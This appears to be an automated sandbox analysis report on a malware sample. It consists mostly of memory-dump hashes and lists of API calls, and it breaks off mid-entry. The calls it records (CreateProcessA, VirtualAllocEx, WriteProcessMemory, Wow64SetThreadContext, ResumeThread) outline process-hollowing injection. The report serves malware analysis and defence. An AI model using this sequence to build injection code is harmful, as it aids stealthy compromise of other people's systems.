                                                • Opcode ID: d0508b3a825b1911efeac1712675a6d6b9ce10e6f9484d6adddcaab641ecc47d
                                                • Instruction ID: 071d705bfb03be4f27b01d8c1972ab5b3bc1f18d6e210ee0e306ab65526bc123
                                                • Opcode Fuzzy Hash: d0508b3a825b1911efeac1712675a6d6b9ce10e6f9484d6adddcaab641ecc47d
                                                • Instruction Fuzzy Hash: F9B1E9B4E15619DBCB04CFAAD98089EFBF2BF89340F14D56AD425FB214E73099029F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4679d2f85611647a6decb6615f55474f7f4e4d50da294024525d3984b5eff831
                                                • Instruction ID: 6c7031148d88bdc606e697236c8494e4d72cedfadbcc5fb235a0a3c830fb8b46
                                                • Opcode Fuzzy Hash: 4679d2f85611647a6decb6615f55474f7f4e4d50da294024525d3984b5eff831
                                                • Instruction Fuzzy Hash: 83E1FCB4E042198FCB14DFA9C5809AEFBF2FF89314F249169E414AB356D730A942DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c6762dd4d5b10fd998a516cb9c29007a70e8e672e5fd2d703f76cbf70c3416a
                                                • Instruction ID: 088839effb4bcb88e75326a3c42e75a6c3cde2ab296cfbb3d6ecd5e1a6e906bc
                                                • Opcode Fuzzy Hash: 2c6762dd4d5b10fd998a516cb9c29007a70e8e672e5fd2d703f76cbf70c3416a
                                                • Instruction Fuzzy Hash: 48E10BB4E002198FDB14DFA9C5809AEFBF2FF89304F249569E414AB356D730A942DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f5a3d79cf91a6b07efecd6766c130cd89f6945d6c0490f3129886cdbb8f6656
                                                • Instruction ID: 03c6f18d4521f3008668f24d8b2066e29b6d87843f66d51c7fbf15d7ee960554
                                                • Opcode Fuzzy Hash: 8f5a3d79cf91a6b07efecd6766c130cd89f6945d6c0490f3129886cdbb8f6656
                                                • Instruction Fuzzy Hash: 00E1FBB4E002198FCB14DFA9C5809AEFBB2FF89304F249569E414AB356D731A942DF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82c75c6541d8f2665ecff99a9df5f259d83fd2b357c4659f9c3da8747b02ab58
                                                • Instruction ID: e1c3c1eb78245bd025a50c694483ab88091e99ff75a803536d3fc8aa4f406206
                                                • Opcode Fuzzy Hash: 82c75c6541d8f2665ecff99a9df5f259d83fd2b357c4659f9c3da8747b02ab58
                                                • Instruction Fuzzy Hash: 52E10CB4E042198FCB14DFA9C5809AEFBB2FF49304F249169D414AB356D731AD82DFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f977bb864d206a07da7bab398c235073fb25994d68f4a8b1102a85eb23c303c9
                                                • Instruction ID: eda659960ab1e13c331609882006e1efeee38d7134f250afadd51941da1ebe26
                                                • Opcode Fuzzy Hash: f977bb864d206a07da7bab398c235073fb25994d68f4a8b1102a85eb23c303c9
                                                • Instruction Fuzzy Hash: 66E11DB4E042198FCB14DFA9C5849AEFBF2FF89304F249169D414AB356D770A982CF61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a0f987e9085a3a931c27981602b6c10f03070ecb7ce9f9428e719c0be3e4c6b0
                                                • Instruction ID: 19e44397434098d6bab617e5ac6a8fc1ae3f47a985527fc82ec6fb13d4362d9e
                                                • Opcode Fuzzy Hash: a0f987e9085a3a931c27981602b6c10f03070ecb7ce9f9428e719c0be3e4c6b0
                                                • Instruction Fuzzy Hash: 7BD10835D20A5A9ACB10EF64D990A9DF771FF95300F50CB9AE40937225EF706AC4CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1733610804.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fa0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 812fbdf657591f623c2eb21c74d4c7561492e744fe1c11cb930624ffe060e5e2
                                                • Instruction ID: 724449b2df5d095bd2568313d934584995003dba929c4fee147955aa3b10089a
                                                • Opcode Fuzzy Hash: 812fbdf657591f623c2eb21c74d4c7561492e744fe1c11cb930624ffe060e5e2
                                                • Instruction Fuzzy Hash: 39A18F72E002098FCF15DFB4D84459EBBB2FF86310B15857AE802AF265DB35E94ADB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03258d6fda866c3fe6a499eafe42a998c53f5e2152795ecbb428b2d367e5d75e
                                                • Instruction ID: 329a3d948018791f59be8b46018902620e83605c4f21530ae20ab36116939969
                                                • Opcode Fuzzy Hash: 03258d6fda866c3fe6a499eafe42a998c53f5e2152795ecbb428b2d367e5d75e
                                                • Instruction Fuzzy Hash: 72D1F835D20A1A9ACB10EFA4D990A9DF771FF95300F50CB9AE40937225EF706AC5CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 58686e0cb3183c05cf30fb9ba6cde338dfdf3a35af33ea3f4de353f961340f07
                                                • Instruction ID: b73c2e52974ac58c88a05f32d388cdd3498cb3aa861e90c23c95c9ea70d85e0e
                                                • Opcode Fuzzy Hash: 58686e0cb3183c05cf30fb9ba6cde338dfdf3a35af33ea3f4de353f961340f07
                                                • Instruction Fuzzy Hash: 0981B1B4E15219CFCB44CF99C5849AEFBF1FF89250F14955AD415AB320D334AA42CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fcd08c91e7c9831738e9d44a112005cf3724b8236822514eedc5b0e9cdd7dad7
                                                • Instruction ID: 9b27958a3e27f646ad9b429fe2d802fd0c3c925eaacf0bd57787a7619d5d52d3
                                                • Opcode Fuzzy Hash: fcd08c91e7c9831738e9d44a112005cf3724b8236822514eedc5b0e9cdd7dad7
                                                • Instruction Fuzzy Hash: 6C81B174E11219CFCB44CFA9C5859AEFBF1FF89250F14956AE425AB320D334AA42CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 75b6ce205aaf08279b0194a25db001ece04b03c02c658d88abd723b773a58f45
                                                • Instruction ID: 6a7492a5fc81c6c6856d174509993cbe7ed7807956797164941105a7caa05d54
                                                • Opcode Fuzzy Hash: 75b6ce205aaf08279b0194a25db001ece04b03c02c658d88abd723b773a58f45
                                                • Instruction Fuzzy Hash: A16144B092560DDBCB28CF91E18A15EBFB1FFC9380FA4D499C4A593144DB789672CB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1aaecd5ae72bb5b8e3018a393d0515cf050cb9839aa20794f73e23c389f1c213
                                                • Instruction ID: f4591312eb80893894dcf620ca6c9365c588e6298f0604c526433e029e06db78
                                                • Opcode Fuzzy Hash: 1aaecd5ae72bb5b8e3018a393d0515cf050cb9839aa20794f73e23c389f1c213
                                                • Instruction Fuzzy Hash: D46123B4E1522ADFCB04CFAAD4815EEFBB2BF89340F54945AD425A7204D334AA42CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 121943472ef34e2e3cd23a8c5daefc7f4373c334c55c38d65f7ca4eb253cfca1
                                                • Instruction ID: 6db0ace50c7496c9399fbc1235f827e2b0f76ee3716dbce8913d920d1678b040
                                                • Opcode Fuzzy Hash: 121943472ef34e2e3cd23a8c5daefc7f4373c334c55c38d65f7ca4eb253cfca1
                                                • Instruction Fuzzy Hash: 375128B4E1521ADFCB04CFA9D4815AEFBB2FF89340F54D46AD425A7240D734AA42CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e38eeb3b146b1528bd8f268b80a60ab3bb5f049801abeebd29a7fb586ade302
                                                • Instruction ID: fa7db2dfcaea48c93f833cf1ac11931706ff5fec7ce77389b48049eba341df1b
                                                • Opcode Fuzzy Hash: 2e38eeb3b146b1528bd8f268b80a60ab3bb5f049801abeebd29a7fb586ade302
                                                • Instruction Fuzzy Hash: 7F5158B0E1521ACFCB18CFA6D4455AEFFF2EF89340F10D82AE415A3254D7385A428FA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ecac2fe4e6ec6f6ba14fb4bb4c58d32bb9f63560785e482ea17a121cf9e1dc34
                                                • Instruction ID: 0b1777355e79d3e286009012197df3843a8ccbb670f83e04fc4e8fd1fa087f95
                                                • Opcode Fuzzy Hash: ecac2fe4e6ec6f6ba14fb4bb4c58d32bb9f63560785e482ea17a121cf9e1dc34
                                                • Instruction Fuzzy Hash: 305149B0E1521A9FCB18CFA6D5455AEFFF2EF89340F10D82AE415A7254D7385A42CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6954846123a191c6f0b706d5545fa8987d7bd3ffd96cbce05657d4b50ea8506
                                                • Instruction ID: 43e8dbe4e829c8ff8326604501743a83936c19dde29d3f0c83f4e37cd2ebb6a4
                                                • Opcode Fuzzy Hash: c6954846123a191c6f0b706d5545fa8987d7bd3ffd96cbce05657d4b50ea8506
                                                • Instruction Fuzzy Hash: CC511CB5E042298FDB14CFA9C5849AEFBF2BF89314F24C169D418A7356D7309942CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0859e15fc617615c96aa21f26656a39c4f16bdc03117dac4fae39932061b9896
                                                • Instruction ID: b5fddbb897404ad6585186c86b10e27895e63b0bbe46f66f30cc0bffa7a7bc50
                                                • Opcode Fuzzy Hash: 0859e15fc617615c96aa21f26656a39c4f16bdc03117dac4fae39932061b9896
                                                • Instruction Fuzzy Hash: FB510DB5E012198BDB14CFA9D5409AEFBF2FF89304F24C569D418A7316DB319942CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c6c0a333acf2f16550dda41162a3088a1e40ac1674d025d765ee8106d7d5fe1
                                                • Instruction ID: 71cf076b63f0ce999e35cda99936d39f75be6323e7afe7d0c860cd6e28c8d6f3
                                                • Opcode Fuzzy Hash: 6c6c0a333acf2f16550dda41162a3088a1e40ac1674d025d765ee8106d7d5fe1
                                                • Instruction Fuzzy Hash: 4F4118B0E0021ADFCB04CFAAD4815EEFBF6BF89340F50D06AD429A7200E7349A428F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1739617348.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7720000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 715e542c0359ad287d5d77d091473afed0c581f6dabc2cac8cc2aa6c39f229e9
                                                • Instruction ID: dc12aedba74b0e9c825c73116bd173d2aa559d35248ff0ec37a99bc31b23b752
                                                • Opcode Fuzzy Hash: 715e542c0359ad287d5d77d091473afed0c581f6dabc2cac8cc2aa6c39f229e9
                                                • Instruction Fuzzy Hash: 16413BB0E0421ADFCB04CFAAC4815AEFBF2BF89350F24D56AD429A7244D7349642CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-2697097662
                                                • Opcode ID: e0abf9a0990fdd63153b8d81629cd06904339d0338bc61162bdaa8e927a9f6ea
                                                • Instruction ID: fe2d155c7016ef7ab755164495fc4900d3f1557be49267b4b1a5ac502f02dbf2
                                                • Opcode Fuzzy Hash: e0abf9a0990fdd63153b8d81629cd06904339d0338bc61162bdaa8e927a9f6ea
                                                • Instruction Fuzzy Hash: 56121870E0121A8FCB18EF75F89569DB7B2FF44304F5089A8D009AB369DF746989CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1736993285.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_52e0000_gunzipped.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                • API String ID: 0-2697097662
                                                • Opcode ID: cfe1fbe72762308b654771496b00a70861cc89e69cbe9998fb5f31c8f21bc947
                                                • Instruction ID: c2d076643aef5e7e6556fe4999db54349590f80913b3e27cbfc0f9fa413dd240
                                                • Opcode Fuzzy Hash: cfe1fbe72762308b654771496b00a70861cc89e69cbe9998fb5f31c8f21bc947
                                                • Instruction Fuzzy Hash: 41121770E0121A8FCB18EF75F89569DB7B2FF44304F5089A8D009AB369DF746989CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:8.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:84
                                                Total number of Limit Nodes:5
                                                [Execution graph rendering omitted; only the API-call nodes are recoverable from the residue]
                                                • 2b9d378: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                                • 2b94668 -> 2b944e4: CreateActCtxA
                                                • 722f7a0: VirtualAllocEx
                                                • 722f860: WriteProcessMemory
                                                • 722f950: ReadProcessMemory
                                                • 585d320 / 5857b70 -> 585647c: GetCurrentThreadId
                                                • 2b9abf0 -> 2b9af20: GetModuleHandleW; 2b9a0a8: LoadLibraryExW
                                                • 2b9d5c0: DuplicateHandle
                                                • 722fae8: CreateProcessA
                                                • 722f6c8: Wow64SetThreadContext
                                                • 722f618: ResumeThread

                                                Control-flow Graph

                                                [Control-flow graph rendering (executed / not executed blocks) omitted; function at 2b9d368, basic blocks 2b9d368-2b9d545, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, sub_2b9d547 and GetCurrentThreadId]
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D3F6
                                                • GetCurrentThread.KERNEL32 ref: 02B9D433
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D470
                                                • GetCurrentThreadId.KERNEL32 ref: 02B9D4C9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: cc06dfc85dcbbc29ab0cb3ef5e2bf5a2073dae469b5416e9fb3187d2415ba9fb
                                                • Instruction ID: 41c9212dfc0a46073915f9b8242858d4b6cf9b26e0a203f426965534c896e6f9
                                                • Opcode Fuzzy Hash: cc06dfc85dcbbc29ab0cb3ef5e2bf5a2073dae469b5416e9fb3187d2415ba9fb
                                                • Instruction Fuzzy Hash: E45168B09102098FDB14DFAAD5487DEBBF1AF49304F24C469E019A73A1DB749984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                [Control-flow graph rendering (executed / not executed blocks) omitted; function at 2b9d378, basic blocks 2b9d378-2b9d545, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, sub_2b9d547 and GetCurrentThreadId]
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D3F6
                                                • GetCurrentThread.KERNEL32 ref: 02B9D433
                                                • GetCurrentProcess.KERNEL32 ref: 02B9D470
                                                • GetCurrentThreadId.KERNEL32 ref: 02B9D4C9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 991cd8c50542cba85cace2b2ecfdf26707cb36c1fd1429f0fae6236e1540fd89
                                                • Instruction ID: 83b1578d071156d1fdb230c3717be283e2287ae1641a5a616ea2d4303ab19823
                                                • Opcode Fuzzy Hash: 991cd8c50542cba85cace2b2ecfdf26707cb36c1fd1429f0fae6236e1540fd89
                                                • Instruction Fuzzy Hash: 305138B09102098FDB14DFAAD548BDEBBF1EF49304F24C469E019A73A0DB74A984CF65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722FD1E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: d7452d2ab8154c7b93d415b10f062e6fd81397a0f3cb53c9d5b17de6e2a5cc7e
                                                • Instruction ID: 7a61e53726aec934717100623bd7b021853d01b8e04fae2b53766a424709e834
                                                • Opcode Fuzzy Hash: d7452d2ab8154c7b93d415b10f062e6fd81397a0f3cb53c9d5b17de6e2a5cc7e
                                                • Instruction Fuzzy Hash: 30A1AFB1D1022ADFDF10CF68C9417DDBBB2BF49310F1485A9E808A7250DB749982DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0722FD1E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                • Opcode ID: e3f1969584c68ff1c312c607d02acd5072de9d54f0df17e8cb91b391ceedbc4b
                                                • Instruction ID: 26aef13ac96003c407a2e376b5714996dcc89a4f90a8eb6e1ebf663340ed68f3
                                                • Opcode Fuzzy Hash: e3f1969584c68ff1c312c607d02acd5072de9d54f0df17e8cb91b391ceedbc4b
                                                • Instruction Fuzzy Hash: 8D918EB1D1022ADFDB10CF68C9417EDBBB6BF49310F1485A9E808A7250DB749986DF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02B9AF3E
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b43534a2e36f4aa9f74e8cf13687fbcfd01a9734515b5580b89510806bb62527
                                                • Instruction ID: 120744bc0350963f797ca9fed621da82d14dce569efc711e98987d40e637449d
                                                • Opcode Fuzzy Hash: b43534a2e36f4aa9f74e8cf13687fbcfd01a9734515b5580b89510806bb62527
                                                • Instruction Fuzzy Hash: E07143B0A00B058FDB24DF2AD54475ABBF5FF88304F108A6DD48ADBA50DB35E945CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02B959A9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 55882d5ba8eda23aa2236b72fd01a1f4747f0a7f5cec364526f5227627e378ce
                                                • Instruction ID: 56b6557ffb4c8cbb91de23a90d82f0490a40c68a24f34727a5bf1831616ebd57
                                                • Opcode Fuzzy Hash: 55882d5ba8eda23aa2236b72fd01a1f4747f0a7f5cec364526f5227627e378ce
                                                • Instruction Fuzzy Hash: BE41D4B0C0071DCFDB24DFA9C884B9EBBB5BF49304F6080AAD419AB255DB756945CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateActCtxA.KERNEL32(?), ref: 02B959A9
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1763734293.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2b90000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: 231c197af0edd180452c2d652053d3f211f8bcd5e51befd4fa4856f5ae3d2d02
                                                • Instruction ID: 027777855c7a3341831faa42bb77d61e4cb1e7746eb5c3f34a96e27b363fcfe1
                                                • Opcode Fuzzy Hash: 231c197af0edd180452c2d652053d3f211f8bcd5e51befd4fa4856f5ae3d2d02
                                                • Instruction Fuzzy Hash: FC4104B1C00719CFDB24CFA9C984BDDBBB5BF48304F2480AAD418AB255DB75694ACF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722F8F0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: 819bc6cd72b8f8141106a230417113eaaf58bf1f786beb4a43f8ab395bab2348
                                                • Instruction ID: 7e37d30a753d426594577b2a0216a4714ec863b59d464dbf35bee4a8adab51bb
                                                • Opcode Fuzzy Hash: 819bc6cd72b8f8141106a230417113eaaf58bf1f786beb4a43f8ab395bab2348
                                                • Instruction Fuzzy Hash: A32146B29003599FCB10CFA9C885BDEBBF4FF48310F10842AE959A7250C7789955DBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0722F8F0
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1768979558.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_7220000_mPvIOxEZXJsdYp.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0722F9D0
